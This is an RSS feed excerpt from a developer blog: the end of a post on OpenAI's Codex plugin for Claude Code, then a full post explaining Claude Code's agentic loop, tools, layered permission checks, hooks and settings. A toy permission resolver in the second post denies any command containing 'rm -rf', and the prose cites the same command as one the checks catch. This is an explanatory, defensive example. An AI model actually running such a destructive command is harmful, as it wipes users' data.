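&lt;p&gt;Fire, wait, print, exactly as described: nothing here requires Codex and Claude to share a runtime, just a socket and some JSON.&lt;/p&gt;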

&lt;p&gt;No separate auth either. It rides the same local Codex CLI login and config you already have, which makes the whole thing feel closer to a sharp CLI wrapper than a native co-reasoning tool. &lt;code&gt;/codex:rescue&lt;/code&gt; can detach into tracked background jobs, and there's even an optional stop-time review gate wired to Claude Code's &lt;code&gt;Stop&lt;/code&gt; hook. That's clever, slightly chaotic, and honestly pretty useful.&lt;/p&gt;

&lt;h2&gt;
  
  
  Distribution math
&lt;/h2&gt;

&lt;p&gt;It also lands right as OpenAI is pushing Codex plugins much harder. Their docs now treat plugins as bundles that can mix skills with app integrations or MCP servers, and the examples already point at Slack and Linear, plus a Sentry-flavored workflow. So this Claude Code repo doesn't feel random to me. It feels like distribution math.&lt;/p&gt;

&lt;p&gt;My read? OpenAI picked the faster path, not the deepest one. They got Codex inside a rival's editor without needing the cleanest possible protocol story. A fuller MCP route would've been more intimate. Claude could call Codex mid-loop and react to it on the fly. But that isn't what this repo is. This is closer to "shell out, let Codex cook, hand the text back," and that might be exactly why it shipped this week instead of later.&lt;/p&gt;

&lt;h2&gt;
  
  
  The real signal
&lt;/h2&gt;

&lt;p&gt;I don't think the real story is the three commands. I think it's the admission hiding inside the architecture: devs pick their own surface area, and the model company that shows up there wins more than the one that insists everyone come home.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow me on &lt;a href="https://x.com/oldeucryptoboi" rel="noopener noreferrer"&gt;X&lt;/a&gt; — I post as &lt;a class="mentioned-user" href="https://dev.to/oldeucryptoboi"&gt;@oldeucryptoboi&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>openai</category>
      <category>codex</category>
      <category>claudecode</category>
      <category>devtools</category>
    </item>
    <item>
      <title>Inside Claude Code's Architecture: The Agentic Loop That Codes For You</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Tue, 31 Mar 2026 04:29:49 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/inside-claude-codes-architecture-the-agentic-loop-that-codes-for-you-cmk</link>
      <guid>https://dev.to/oldeucryptoboi/inside-claude-codes-architecture-the-agentic-loop-that-codes-for-you-cmk</guid>
      <description>&lt;h2&gt;
  
  
  How Anthropic built a terminal AI that reads, writes, executes, asks permission, and loops until the job is done
&lt;/h2&gt;




&lt;p&gt;I've been living inside Claude Code for months. It writes my code, runs my tests, commits my changes, reviews my PRs. At some point I stopped thinking of it as a tool and started thinking of it as a collaborator with terminal access.&lt;/p&gt;

&lt;p&gt;So I read the architecture doc. Not the marketing page, not the changelog — the actual internal architecture of how Claude Code works under the hood. And it's more interesting than I expected, because the design decisions explain a lot of the behavior I've been experiencing as a user.&lt;/p&gt;

&lt;p&gt;Here's what's actually going on.&lt;/p&gt;

&lt;h2&gt;
  
  
  The agentic loop
&lt;/h2&gt;

&lt;p&gt;Claude Code isn't a chatbot with a code plugin. It's an agentic loop.&lt;/p&gt;

&lt;p&gt;You type something. Claude responds with text, tool calls, or both. Tools execute with permission checks. Results feed back to Claude. Claude decides whether to call more tools or respond. Loop continues until Claude produces a final text response with no tool calls.&lt;/p&gt;

&lt;p&gt;That's it. That's the whole thing. But the details matter.&lt;/p&gt;
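&lt;p&gt;The loop is small enough to sketch. This is a toy version with a scripted model and a stubbed tool executor, not Claude Code's actual implementation:&lt;/p&gt;

```typescript
type ToolCall = { name: string; input: unknown };
type ModelTurn = { text: string; toolCalls: ToolCall[] };

// Scripted model: first turn requests a tool, second turn answers in text.
// A real client would call the API here and stream the response.
const scripted: ModelTurn[] = [
  { text: "", toolCalls: [{ name: "Read", input: { path: "README.md" } }] },
  { text: "Done: summarized README.md", toolCalls: [] },
];
let turn = 0;
function callModel(history: string[]): ModelTurn {
  return scripted[turn++];
}

// Stubbed tool executor; real tools run the permission checks first.
function runTool(call: ToolCall): string {
  return `[result of ${call.name}]`;
}

// The loop: call model, run any requested tools, feed results back,
// stop on the first turn with no tool calls.
function agentLoop(prompt: string): string {
  const history: string[] = [prompt];
  for (;;) {
    const t = callModel(history);
    if (t.toolCalls.length === 0) return t.text;
    for (const call of t.toolCalls) history.push(runTool(call));
  }
}

const answer = agentLoop("Summarize the README");
console.log(answer);
```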

&lt;p&gt;The loop is streaming-first. API responses come as Server-Sent Events and render incrementally. Tool calls are detected mid-stream and trigger execution pipelines before the full response is even done. This is why Claude Code feels responsive even when it's doing complex multi-step work — you see thinking and tool calls appearing in real time, not after a long pause.&lt;/p&gt;
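&lt;p&gt;A sketch of what mid-stream detection looks like. The event shapes below loosely follow Anthropic's streaming API, but treat the exact field names as an assumption of this sketch:&lt;/p&gt;

```typescript
// SSE lines as they might arrive from a streaming response.
const sseLines = [
  'data: {"type":"content_block_start","content_block":{"type":"text"}}',
  'data: {"type":"content_block_delta","delta":{"text":"Let me check."}}',
  'data: {"type":"content_block_start","content_block":{"type":"tool_use","name":"Grep"}}',
];

const toolCallsDetected: string[] = [];
for (const line of sseLines) {
  if (!line.startsWith("data: ")) continue;
  const ev = JSON.parse(line.slice("data: ".length));
  // A tool call is visible the moment its block starts, so the
  // execution pipeline can spin up before the stream finishes.
  if (ev.type === "content_block_start") {
    if (ev.content_block.type === "tool_use") {
      toolCallsDetected.push(ev.content_block.name);
    }
  }
}
console.log(toolCallsDetected);
```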

&lt;p&gt;Claude can chain multiple tool calls per turn. That's why you'll sometimes see it read three files, run a grep, and edit a function all in one burst. It's not making separate requests for each — it's one API call that returns multiple &lt;code&gt;tool_use&lt;/code&gt; blocks, each executing in sequence.&lt;/p&gt;

&lt;h2&gt;
  
  
  The tool system
&lt;/h2&gt;

&lt;p&gt;There are about 26 built-in tools. Each one implements the same interface:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An input schema (validated with Zod before execution)&lt;/li&gt;
&lt;li&gt;A permission check (returns allow, deny, or ask)&lt;/li&gt;
&lt;li&gt;The actual execution logic&lt;/li&gt;
&lt;li&gt;UI renderers for the terminal display&lt;/li&gt;
&lt;/ul&gt;
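&lt;p&gt;In TypeScript terms, the four-part interface looks something like this. The real tools validate with Zod; this sketch uses a hand-rolled check, and the &lt;code&gt;Read&lt;/code&gt; tool shown is a simplified stand-in with an invented permission policy:&lt;/p&gt;

```typescript
type Decision = "allow" | "deny" | "ask";
type ReadInput = { path: string };

// The four parts of the interface, sketched for a simplified Read tool.
interface Tool {
  name: string;
  validate(input: unknown): ReadInput;          // real tools use Zod schemas
  checkPermissions(input: ReadInput): Decision;
  execute(input: ReadInput): string;
  render(result: string): string;               // terminal display
}

const readTool: Tool = {
  name: "Read",
  validate(input) {
    const candidate = input as { path?: unknown };
    if (typeof candidate.path !== "string") throw new Error("path must be a string");
    return { path: candidate.path };
  },
  checkPermissions(input) {
    // Invented policy for illustration: system paths force a prompt.
    return input.path.startsWith("/etc/") ? "ask" : "allow";
  },
  execute(input) {
    return `contents of ${input.path}`; // a real Read hits the filesystem
  },
  render(result) {
    return `Read: ${result}`;
  },
};

const input = readTool.validate({ path: "src/index.ts" });
console.log(readTool.checkPermissions(input));
```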

&lt;p&gt;The core tools are what you'd expect: &lt;code&gt;Bash&lt;/code&gt;, &lt;code&gt;Read&lt;/code&gt;, &lt;code&gt;Write&lt;/code&gt;, &lt;code&gt;Edit&lt;/code&gt;, &lt;code&gt;Glob&lt;/code&gt;, &lt;code&gt;Grep&lt;/code&gt;. These are the workhorses. But the meta tools are where it gets interesting.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Task&lt;/code&gt; spawns subagents — child conversations with Claude that get their own isolated context, execute tools, and return a summary. This is how Claude Code parallelizes work. When it needs to research something in one part of the codebase while editing another, it doesn't do them sequentially. It spawns a subagent for the research and continues editing in the main conversation.&lt;/p&gt;

&lt;p&gt;MCP servers contribute additional tools at runtime. Your project can define custom tools — database queries, API calls, deployment scripts — and Claude Code picks them up automatically. The tools show up in Claude's palette alongside the built-in ones.&lt;/p&gt;
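&lt;p&gt;Wiring up a custom server is a config entry. The shape below follows the common &lt;code&gt;.mcp.json&lt;/code&gt; layout as I understand it; the server name, command, and script path are hypothetical:&lt;/p&gt;

```json
{
  "mcpServers": {
    "deploy-tools": {
      "command": "node",
      "args": ["./mcp/deploy-server.mjs"]
    }
  }
}
```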

&lt;h2&gt;
  
  
  Permissions: the part that actually matters
&lt;/h2&gt;

&lt;p&gt;Five permission modes: default (ask for everything), acceptEdits (auto-approve file changes, ask for shell commands), plan (read-only until you approve), bypassPermissions (auto-approve everything), and auto (automation-friendly minimal approval).&lt;/p&gt;

&lt;p&gt;But the modes are just the top layer. Every tool call goes through a five-step gauntlet:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The tool's own &lt;code&gt;checkPermissions()&lt;/code&gt; — Bash checks for destructive commands, Write checks file paths&lt;/li&gt;
&lt;li&gt;Settings allowlist/denylist — glob patterns like &lt;code&gt;Bash(npm:*)&lt;/code&gt; or &lt;code&gt;Read(~/project/**)&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Sandbox policy — managed restrictions on paths, commands, network access&lt;/li&gt;
&lt;li&gt;The active permission mode — may auto-approve or force-ask regardless of the above&lt;/li&gt;
&lt;li&gt;Hook overrides — &lt;code&gt;PreToolUse&lt;/code&gt; hooks can approve, block, or modify the call before it executes&lt;/li&gt;
&lt;/ol&gt;
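&lt;p&gt;First-decisive-answer-wins is one way to model that gauntlet. Here's a toy resolver where each layer's logic is invented purely for illustration (the real layers interact in subtler ways, e.g. hooks can override earlier decisions):&lt;/p&gt;

```typescript
type Decision = "allow" | "deny" | "ask" | "pass";
type Call = { tool: string; command: string };

// The five layers in order. "pass" means the layer has no opinion and
// the next one decides.
const gauntlet: ((call: Call) => Decision)[] = [
  (c) => (c.command.includes("rm -rf") ? "deny" : "pass"),  // 1. tool's own check
  (c) => (c.tool === "Read" ? "allow" : "pass"),            // 2. settings allowlist
  () => "pass",                                             // 3. sandbox policy
  (c) => (c.tool === "Edit" ? "allow" : "pass"),            // 4. acceptEdits mode
  () => "pass",                                             // 5. hook overrides
];

function resolve(call: Call): Decision {
  for (const layer of gauntlet) {
    const d = layer(call);
    if (d !== "pass") return d;
  }
  return "ask"; // nothing decisive: prompt the user
}

console.log(resolve({ tool: "Bash", command: "rm -rf /tmp/x" })); // deny
console.log(resolve({ tool: "Edit", command: "apply patch" }));   // allow
console.log(resolve({ tool: "Bash", command: "npm test" }));      // ask
```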

&lt;p&gt;This layered model is why Claude Code can feel both powerful and safe at the same time. When I'm in acceptEdits mode, it flies through file changes without asking. But if it tries to run &lt;code&gt;rm -rf&lt;/code&gt; or push to main, the tool-level check catches it before the mode override even matters.&lt;/p&gt;

&lt;p&gt;The hooks are the escape hatch for everything else. You can write a shell script that runs before every Bash command and blocks anything matching a pattern. You can run a linter after every file edit. You can inject additional context into every user prompt. It's event-driven and configurable in &lt;code&gt;settings.json&lt;/code&gt;.&lt;/p&gt;
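&lt;p&gt;For example, a &lt;code&gt;PreToolUse&lt;/code&gt; hook that screens Bash commands might be registered like this (the field layout follows the hooks docs as I remember them, and the script path is hypothetical, so check before copying):&lt;/p&gt;

```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "Bash",
        "hooks": [
          { "type": "command", "command": "./scripts/screen-bash.sh" }
        ]
      }
    ]
  }
}
```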

&lt;h2&gt;
  
  
  Configuration hierarchy
&lt;/h2&gt;

&lt;p&gt;Settings merge in a specific order, with later values winning:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Defaults → ~/.claude/settings.json (user global) → .claude/settings.json (project, checked into VCS) → .claude/settings.local.json (project local, gitignored) → CLI flags → environment variables
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a good design. Your team checks in project-level settings (allowed tools, MCP servers, hooks). You override locally with your preferences. CI overrides with environment variables. Nobody steps on anyone else.&lt;/p&gt;
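&lt;p&gt;"Later values winning" works key-by-key, the way object spread does. A toy illustration with invented keys (the real merge presumably recurses into nested objects rather than spreading flat):&lt;/p&gt;

```typescript
// Three layers of the hierarchy, lowest priority first.
const defaults = { model: "default", permissionMode: "default" };
const userGlobal = { permissionMode: "acceptEdits" };
const projectLocal = { model: "opus" };

// Later spreads override earlier ones key-by-key.
const effective = { ...defaults, ...userGlobal, ...projectLocal };
console.log(effective); // { model: 'opus', permissionMode: 'acceptEdits' }
```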

&lt;h2&gt;
  
  
  Context management
&lt;/h2&gt;

&lt;p&gt;Conversations persist across turns in &lt;code&gt;~/.claude/sessions/&lt;/code&gt;. When you're approaching the context window limit, older messages get summarized — Claude Code calls this "context compaction." There are even pre/post hooks for the compaction step so you can preserve specific information that shouldn't get summarized away.&lt;/p&gt;

&lt;p&gt;The memory system is layered too. CLAUDE.md files provide persistent instructions per-project. Auto-memory files in &lt;code&gt;~/.claude/memory/&lt;/code&gt; accumulate patterns across sessions. Session history lets you resume or fork previous conversations.&lt;/p&gt;

&lt;p&gt;This is the part that makes Claude Code feel like it "knows" your project. It's not magic — it's a well-designed context injection pipeline. CLAUDE.md gets loaded into every system prompt. Memory files get loaded on startup. Your conversation history from yesterday is still there when you &lt;code&gt;/resume&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Multi-agent coordination
&lt;/h2&gt;

&lt;p&gt;Subagents via the &lt;code&gt;Task&lt;/code&gt; tool run as nested conversations within the same process. Same Claude model, separate context window, returns a summary when done.&lt;/p&gt;

&lt;p&gt;But there's also a Teams system that uses tmux for true parallelism. A lead agent creates a team, members get separate tmux panes with their own Claude sessions, and they communicate through a shared message bus. Each member gets role-specific instructions and tool access.&lt;/p&gt;

&lt;p&gt;I haven't used Teams yet, but the architecture makes sense. Subagents are for quick parallel research within a single task. Teams are for genuinely parallel workstreams — one agent refactoring the backend while another updates the frontend tests.&lt;/p&gt;

&lt;h2&gt;
  
  
  The React terminal
&lt;/h2&gt;

&lt;p&gt;This one surprised me. The terminal interface is a React app rendered via &lt;a href="https://github.com/vadimdemedes/ink" rel="noopener noreferrer"&gt;Ink&lt;/a&gt; — a React renderer for CLIs. The conversation view, input area, tool call displays, permission dialogs, progress indicators — all React components using Yoga (CSS flexbox) for layout and ANSI escape codes for styling.&lt;/p&gt;

&lt;p&gt;It supports inline images via the iTerm protocol. Thinking blocks are collapsible. Tool results show previews with execution status. It's a genuinely well-built terminal UI, not just &lt;code&gt;console.log&lt;/code&gt; with colors.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the architecture tells you about the product
&lt;/h2&gt;

&lt;p&gt;The interesting thing about reading an architecture doc isn't the individual components — it's the design priorities they reveal.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Streaming-first&lt;/strong&gt; means they optimized for perceived speed over simplicity. SSE parsing mid-stream is more complex than waiting for a complete response, but it makes the tool feel alive.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hook-extensible everything&lt;/strong&gt; means they expect power users to customize aggressively. Nearly every action has a pre/post hook point. This isn't an afterthought — it's a core architectural decision.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layered permissions&lt;/strong&gt; means they took safety seriously without making it annoying. Five layers of checks sounds heavy, but in practice most tool calls resolve instantly because the mode and allowlist handle the common cases. The user only sees a prompt when something genuinely unusual happens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Single-process subagents, multi-process teams&lt;/strong&gt; means they thought carefully about the tradeoff between simplicity and parallelism. Subagents are lightweight and fast because they share a process. Teams are heavier but truly parallel because they run in separate tmux panes.&lt;/p&gt;

&lt;p&gt;Claude Code isn't a chat wrapper around an API. It's an agent runtime with a terminal UI. The agentic loop, tool system, permission model, and hook architecture form a coherent system designed to let an LLM operate autonomously on your codebase while giving you exactly the control points you need to stay in charge.&lt;/p&gt;

&lt;p&gt;That's the part that matters. Not what Claude Code can do — but how much thought went into making sure you can control what it does.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow me on &lt;a href="https://x.com/oldeucryptoboi" rel="noopener noreferrer"&gt;X&lt;/a&gt; — I post as &lt;a class="mentioned-user" href="https://dev.to/oldeucryptoboi"&gt;@oldeucryptoboi&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>claude</category>
      <category>ai</category>
      <category>architecture</category>
      <category>devtools</category>
    </item>
  </channel>
</rss>
